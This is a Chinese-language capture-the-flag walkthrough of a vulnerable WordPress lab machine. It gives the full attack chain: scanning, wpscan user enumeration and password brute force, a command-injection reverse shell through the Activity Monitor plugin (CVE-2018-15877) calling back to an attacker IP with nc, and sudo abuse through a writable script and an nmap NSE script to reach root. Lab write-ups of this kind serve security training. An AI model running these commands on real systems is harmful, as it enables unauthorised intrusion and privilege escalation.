一、信息收集
1、查看靶机的MAC地址:
2、查看靶机的ip地址:
nmap 192.168.7.0/24
3、查看靶机开放的端口:
nmap -p- -sC -sT -sV -A 192.168.7.236
4、访问靶机的80端口,发现无法访问但是跳到了一个域名,应该是需要进行修改hosts文件,添加ip到域名的解析:
5、添加好之后进行访问:
6、对网站进行目录扫描:
dirsearch -u "http://192.168.7.236"
7、拼接目录进行查看是否有有效信息,发现有一个登录的网页:
8、使用wpscan来枚举一下用户,记录下来,弄成一个txt:
wpscan --url http://wordy/ --enumerate u
9、在靶机的官网有密码字典:
cat /usr/share/wordlists/rockyou.txt | grep k01 > password.txt
10、对账号和密码进行爆破:
wpscan --url http://wordy/ -U user.txt -P password.txt
Username: mark, Password: helpdesk01
11、使用账号和密码进行登录:
12、在点击页面功能点时发现页面有一个插件功能:
13、搜索相关nday漏洞,发现有一个Activity Monitor存在的RCE漏洞(CVE-2018-15877),然后在工具处有一个ip的框是漏洞处:
14、输入命令,查看是否有回显:
127.0.0.1| ls /
15、使用bp抓包修改命令为反弹shell的语句:
127.0.0.1| nc -e /bin/bash 192.168.7.200 5555 /
16、kali开启监听:
nc -lvvp 5555
17、查看反弹结果,成功反弹,但是用户权限不高:
18、使用命令获得一个交互式shell:
python -c 'import pty;pty.spawn("/bin/bash")'
二、提权
1、由于使用sudo权限需要输入密码,所以没办法进行sudo提权。在一个用户的文件夹里面有一个txt文件,这个文件里面有另一个用户的密码:
cd /home/mark/stuff
cat things-to-do.txt
账号密码:graham / GSo7isUM1D4
2、使用账号密码进行切换用户:
3、查看用户sudo权限,发现有一个文件但是需要jens身份来使用:
4、查看这个文件,发现是一个解压的脚本:
cat /home/jens/backups.sh
5、向这个脚本写入命令,让jens用户执行成功切换到jens用户:
echo "/bin/bash" >> /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh
6、查看该用户的sudo权限,发现有一个文件是root权限:
7、nmap中执行shell方法,获取root权限:
echo "os.execute('/bin/bash')">/tmp/shell.nse
sudo nmap --script=/tmp/shell.nse
8、查看root目录下面的txt:
cd /root
cat theflag.txt